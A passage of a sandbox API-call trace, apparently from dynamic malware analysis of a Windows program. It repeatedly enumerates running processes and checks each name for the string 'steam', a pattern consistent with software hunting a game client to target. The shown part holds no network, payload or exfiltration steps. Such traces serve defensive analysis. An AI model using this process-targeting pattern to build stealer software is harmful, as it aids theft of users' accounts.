lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.142] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b550 [0099.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.143] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.143] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0099.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.144] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357b568 [0099.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357b568, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0099.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0099.144] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="steam") returned 0x0 [0099.144] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0099.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.146] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357b5e0 [0099.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357b5e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0099.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0099.146] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="steam") returned 0x0 [0099.146] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.147] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b838 [0099.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.147] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.147] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.148] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3575030 [0099.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3575030, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0099.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0099.149] StrStrIA (lpFirst="dwm.exe", lpSrch="steam") returned 0x0 [0099.149] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.150] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b988 [0099.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.150] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.150] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.151] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b940 [0099.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.151] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.152] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.153] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b778 [0099.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.153] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.153] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.154] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b910 [0099.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.154] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.154] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.155] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b7c0 [0099.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b7c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.156] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.156] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.157] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b7f0 [0099.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b7f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.157] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.157] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.158] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b9a0 [0099.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.158] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.158] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.158] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.160] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b850 [0099.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.161] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.161] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.162] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b7d8 [0099.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b7d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.162] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.162] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.163] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b8b0 [0099.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.163] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.163] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.165] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b790 [0099.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x357b790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0099.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0099.165] StrStrIA (lpFirst="spoolsv.exe", lpSrch="steam") returned 0x0 [0099.165] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.166] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b730 [0099.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.166] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.166] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.166] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.168] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b8e0 [0099.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x357b8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0099.168] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0099.168] StrStrIA (lpFirst="audiodg.exe", lpSrch="steam") returned 0x0 [0099.168] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0099.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.169] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b8c8 [0099.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x357b8c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0099.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0099.169] StrStrIA (lpFirst="sihost.exe", lpSrch="steam") returned 0x0 [0099.169] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.170] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b868 [0099.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357b868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.170] StrStrIA (lpFirst="svchost.exe", lpSrch="steam") returned 0x0 [0099.170] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.172] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b6e8 [0099.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357b6e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.172] StrStrIA (lpFirst="taskhostw.exe", lpSrch="steam") returned 0x0 [0099.172] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.173] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b928 [0099.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x357b928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0099.173] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0099.173] StrStrIA (lpFirst="explorer.exe", lpSrch="steam") returned 0x0 [0099.173] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0099.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.204] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a818 [0099.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357a818, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0099.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0099.204] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="steam") returned 0x0 [0099.204] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, 